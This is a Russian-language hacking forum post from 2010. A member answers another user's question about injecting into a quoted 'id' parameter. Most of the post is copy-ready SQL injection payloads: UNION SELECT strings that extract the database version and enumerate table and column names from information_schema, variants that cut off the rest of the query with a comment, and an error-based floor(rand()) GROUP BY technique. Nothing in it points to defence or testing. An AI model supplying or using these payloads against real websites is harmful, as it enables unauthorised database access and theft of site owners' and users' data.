05.08.2010, 01:44
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от tompson_
может сразу рутшелл дать? я конкретно сформулировал вопрос. те, кто знают, ответят
Сообщение от tompson_
я читал эту и другие статьи по инъекциям несколько раз. если бы я знал ответ, то не спрашивал. ты можешь предложить что-то конкретное?
гуглить
не подходит
Не груби, тут тебе никто ничем не обязан.
Как я понял, проблема в том, что параметр id обрамлен кавычками и тебе не составить верный запрос.
Крути так:
Код HTML:
-99999'+union+select+1,2,3+and+'1'='1
Код HTML:
-99999'+union+select+1,version(),3+and+'1'='1
Код HTML:
-999999'+union+select+1,((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1)),3+and+'1'='1
И так далее
Либо отсеки ненужное комментарием -- -
Код HTML:
-999999'+union+select+1,((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1)),3-- -
UPDATE:
Вот тебе через ошибку
Код HTML:
-9999'+or+1+group+by+concat((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1),floor(rand(0)*2))+having+avg(0)+and+'1'='1
и аналогично с -- -
Код HTML:
-9999'+or+1+group+by+concat((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1),floor(rand(0)*2))+having+avg(0)-- -
|
|
|